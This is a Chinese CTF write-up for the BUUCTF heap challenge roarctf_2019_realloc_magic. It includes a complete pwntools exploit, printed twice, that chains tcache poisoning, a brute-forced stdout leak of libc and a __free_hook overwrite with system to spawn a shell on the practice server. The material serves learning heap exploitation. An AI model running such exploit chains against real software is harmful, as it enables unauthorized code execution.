这道题目帮助我学习了realloc这个函数,是一道十分经典的题目,我会尽量的把exp的每一步都说清楚

例行检查我就不放了

讲程序放入ida中

比较简单的流程,没有show功能,所有我们需要通过爆破stdout这个函数来获得libc

我先放上我学习的俩位师傅的博客

(16条消息) BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)_L.o.W的博客-CSDN博客

好好说话之Tcache Attack(1):tcache基础与tcache poisoning_hollk’s blog-CSDN博客 这个博客重点看tcache poisoning部分

然后我先放上realloc的四种不同的用法

realloc的几个特殊用法(摘自官方WP)

size == 0 ,这个时候等同于free
realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
malloc_usable_size(realloc_ptr) < szie, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉
然后我将完整的exp放在下面进行一步步的分析

------------------------------------------------------------------------------------------------------------------EXP-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

from pwn import *
#p = process('./pwn1')

elf = ELF('./pwn1')
libc = ELF('./libc-2.27.so')

def launch_gdb():
  context.terminal = ['xfce4-terminal','-x','sh','-c']
  gdb.attach(proc.pidof(p)[0])

def add(size,content):
  p.sendlineafter('>> ','1')
  p.sendlineafter('Size?\n',str(size))
  p.sendafter('Content?\n',content)

def free():
  p.sendlineafter('>>','2')

def ba():
  p.sendlineafter('>>','66i6')

def pwn():

  add(0x70,'a')
  add(0,'')
  add(0x100,'a')
  add(0,'')
  add(0xa0,'a')
  add(0,'')    #这里我们申请了四个不同大小的chunk 然后将它们释放掉

  add(0x100,'b')      #然后将chunk2申请回来

  [free() for i in range(7)]   #通过for循环填满tcache的7个chunk块
  add(0,'')         #将申请回来的chunk2释放掉,注意释放掉的chunk将放入unsortedbin里面 (这里会出现mare的地址)

  add(0x70,'a')       #我们将chunk1申请回来
  add(0x180,b'c'*0x78+p64(0x41)+b'\x60\x87')  #我们申请了一个0x180大小的chunk,刚好是chunk1和chunk2加起来的大小,相当于edit将泄露出的地址后面覆盖为了6087去爆破_IO_2_1_stdout的位置

  add(0,'')                  #我们将chunk释放掉(会进入unsortedbin的链表里面)

  add(0x100,'a')                #我们将chunk2申请回来,注意这个chunk是从tcache里面申请的,fd已经是stdout的位置了
  add(0,'')                  #我们将chunk2释放掉,但是因为这个chunk的大小我们已经改成了0x41大小了,所以这个chunk会放在新的tcache的队列里面,所以0x110的队列就留下了fd的指针,又因为fd指向的是stdout的地址所以我们在申请一个chunk就能申请到相应的地址上面了

  add(0x100,p64(0xfbad1887)+p64(0)*3+p8(0x58))  #在这里我们申请到了stdout的位置 下面获得libc

  libc_base = u64(p.recvuntil('\x7f',timeout=0.1)[-6:].ljust(8,b'\x00')) - 0x3e82a0 #0x3e82a0这个值是减去vmmap的里面相应的值

  if libc_base == -0x3e82a0: if判断形成自动化
    exit(-1)
  print('libc_base:'+hex(libc_base))

  free_hook = libc_base + libc.sym['__free_hook']
  onegadget = libc_base + 0xf4322
  system = libc_base + libc.sym['system']
  p.sendline('666')
  add(0x120,'a')
  add(0,'')
  add(0x130,'a')
  add(0,'')
  add(0x170,'a')
  add(0,'')

  add(0x130,'a')     和上面泄露libc的同理由
  [free() for i in range(7)]
  add(0,'')
  add(0x120,'a')
  add(0x260,b'a'*0x128+p64(0x41)+p64(free_hook-8))
  add(0,'')
  add(0x130,'a')
  add(0,'')
  add(0x130,b'/bin/sh\x00'+p64(system))
  free()

  p.interactive()
if __name__ == "__main__":
  while True:
#p = process('./pwn1')
    p = remote('node4.buuoj.cn',28076)
    try:
      pwn()
    except:
      p.close()

------------------------------------------------------------------------------------------------------------------------------------------------------------结束-------------------------------------------------------------------------------------------------------------------------------------------------------

这道题是一个非常好的题目,希望可以多多复习一下,能认真的去理解和调试一下

完整exp

from pwn import *

#p = process('./pwn1')

elf  = ELF('./pwn1')

libc = ELF('./libc-2.27.so')

def launch_gdb():

    context.terminal = ['xfce4-terminal','-x','sh','-c']

    gdb.attach(proc.pidof(p)[0])

def add(size,content):

    p.sendlineafter('>> ','1')

    p.sendlineafter('Size?\n',str(size))

    p.sendafter('Content?\n',content)

def free():

    p.sendlineafter('>>','2')

def ba():

    p.sendlineafter('>>','66i6')

def pwn():

    add(0x70,'a')

    add(0,'')

    add(0x100,'a')

    add(0,'')

    add(0xa0,'a')

    add(0,'')

    add(0x100,'b')

    [free() for i in range(7)]

    add(0,'')

    add(0x70,'a')

    add(0x180,b'c'*0x78+p64(0x41)+p8(0x60)+p8(0x87))

    add(0,'')

    add(0x100,'a')

    add(0,'')

    add(0x100,p64(0xfbad1887)+p64(0)*3+p8(0x58))

    libc_base = u64(p.recvuntil('\x7f',timeout=0.1)[-6:].ljust(8,b'\x00')) - 0x3e82a0

    if libc_base == -0x3e82a0:

        exit(-1)

    print('libc_base:'+hex(libc_base))

    free_hook = libc_base + libc.sym['__free_hook']

    onegadget = libc_base + 0xf4322

    system = libc_base + libc.sym['system']

    p.sendline('666')

    add(0x120,'a')

    add(0,'')

    add(0x130,'a')

    add(0,'')

    add(0x170,'a')

    add(0,'')

    add(0x130,'a')

    [free() for i in range(7)]

    add(0,'')

    add(0x120,'a')

    add(0x260,b'a'*0x128+p64(0x41)+p64(free_hook-8))

    add(0,'')

    add(0x130,'a')

    add(0,'')

    add(0x130,b'/bin/sh\x00'+p64(system))

    free()

    p.interactive()

if __name__ == "__main__":

    while True:

        #p = process('./pwn1')

        p = remote('node4.buuoj.cn',28076)

        try:

            pwn()

        except:

            p.close()

结束

tcache poisoning(爆破stout获得libc并且熟练使用了realloc)的更多相关文章

  1. 由一道CTF pwn题深入理解libc2.26中的tcache机制

    本文首发安全客:https://www.anquanke.com/post/id/104760 在刚结束的HITB-XCTF有一道pwn题gundam使用了2.26版本的libc.因为2.26版本中加 ...

  2. SWPUCTF 2019 pwn writeup

    来做一下以前比赛的题目,下面两个题目都可以在buu复现(感谢赵总). SWPUCTF_2019_login 32位程序,考点是bss段上的格式化字符串.用惯onegadgets了,而对于32位程序来说 ...

  3. BIT 常态化在线CTF系统 pwn题目

    偶然得到这个平台,发现是BIT的CTF平台,应该是平时的阶段性的训练题目.看了看题,其他方向的题目感觉都是入门题,但是pwn题目,发现还是比入门题难一点点的,来记录一下. pwn1 栈上任意位置的读写 ...

  4. Pwn Heap With Tcache

    Pwn Heap With Tcache 前言 glibc 2.26 开始引入了 tcache , 相关的 commit 可以看 这里 .加入 tcache 对性能有比较大的提升,不过由于 tcach ...

  5. Oracle TNS Listener Remote Poisoning

    Oracle TNS Listener Remote Poisoning 远程数据投毒漏洞(CVE-2012-1675) 1.漏洞简介: 允许攻击者在不提供用户名/密码的情况下,向远程“TNS Lis ...

  6. 常见寄存器以及常见汇编指令,常见爆破指令 good

    CPU的任务就是执行存放在存储器里的指令序列.为此,除要完成算术逻辑操作外,还需要担负CPU和存储器以及I/O之间的数据传送任务.早期的CPU芯片只包括运算器和控制器两大部分.到了近几年,为了使存储器 ...

  7. de1ctf_2019_weapon(爆破_IO_2_1_stdout)

    (这是我真正意义上的完完全全自己做的第一道堆题目,虽然花了快三个小时,谨以此篇纪念一下) 题目的例行检查我就不放了,将程序放入ida中 程序的逻辑十分简单,漏洞也非常明显 重点是这个程序没有给我们sh ...

  8. ubuntu进行子域名爆破

    好记性不如烂笔头,此处记录一下,ubuntu进行子域名的爆破. 先记录一个在线的子域名爆破网址,无意中发现,很不错的网址,界面很干净,作者也很用心,很感谢. https://phpinfo.me/do ...

  9. 快来熟练使用 Mac 编程

    熟练使用工具,可以提高一个人的做事效率- 1. iTerm2快捷键使用 ⌘ + d: 垂直分屏,⌘ + shift + d: 水平分屏. ⌘ + ]和⌘ + [在最近使用的分屏直接切换.而⌘ + op ...

随机推荐

  1. Jenkins教程(八)实现 GitLab 触发 Jenkins 自动按模块发布前端

    楔子 上篇文章解决了提交/合并请求自动触发的需求,但所有前端模块都在同一个代码仓库里,如何获取变更文件路径确定要发布哪个模块呢?本文将带你解决这个问题. 思路 分别解决 3 个问题: 获取变更的文件列 ...

  2. 【JavaSE】泛型

    Java泛型 2019-07-05  22:00:24  by冲冲 1. 泛型的引例 1 List list = new ArrayList(); 2 list.add(1022); //向集合中添加 ...

  3. 基于nexus私服配置项目pom.xml和maven settings.xml文件

    备注:搭建nexus私服请参考上一篇文章基于Docker搭建Maven私服Nexus,Nexus详解 一:将jar发送到nexus私服务器 1.pom.xml文件添加配置 pom.xml文件中的这个版 ...

  4. MYSQL免安装

    MYSQL免安装 本文使用mysql 8.0.22进行演示 一.MYSQL 下载 [x] 官网下载:地址:https://dev.mysql.com/downloads/mysql/ [x] 百度云盘 ...

  5. MySQL全面瓦解28:分库分表

    1 为什么要分库分表 物理服务机的CPU.内存.存储设备.连接数等资源有限,某个时段大量连接同时执行操作,会导致数据库在处理上遇到性能瓶颈.为了解决这个问题,行业先驱门充分发扬了分而治之的思想,对大库 ...

  6. BZOJ 3926 诸神眷顾的幻想乡

    BZOJ 3926 诸神眷顾的幻想乡 开始看错题看成了每个点度数不超过20 后来翻了翻题解原来看错题的不止我一个 既然叶子数量不超过20,考虑树上的任何一条路径,以任何点为根时,如果它不是一条从上到下 ...

  7. Codeforces 585E - Present for Vitalik the Philatelist(简单莫反+狄利克雷前缀和)

    Codeforces 题目传送门 & 洛谷题目传送门 一道不算太难的 D1E 罢--虽然我不会做/kk u1s1 似乎这场 Div1 挺水的?F 就是个 AC 自动机板子还被评到了 3k2-- ...

  8. nmap相关

    nmap -sT IP-sT(全链接扫描),获取目标IP+PORT的状态,其实是发了三个包:SYN,SYN/ACK,ACK,类似于TCP三次握手 状态: open 开放的 closed 关闭的 fil ...

  9. R包开发过程记录

    目的 走一遍R包开发过程,并发布到Github上使用. 步骤 1. 创建R包框架 Rsutdio --> File--> New Project--> New Directory - ...

  10. R 语言 select函数在org.Hs.eg.db上的运用

    首先org.Hs.eg.db是一个关于人类的 一,在R中导入包library(org.Hs.eg.db) http://www.bioconductor.org/packages/release/da ...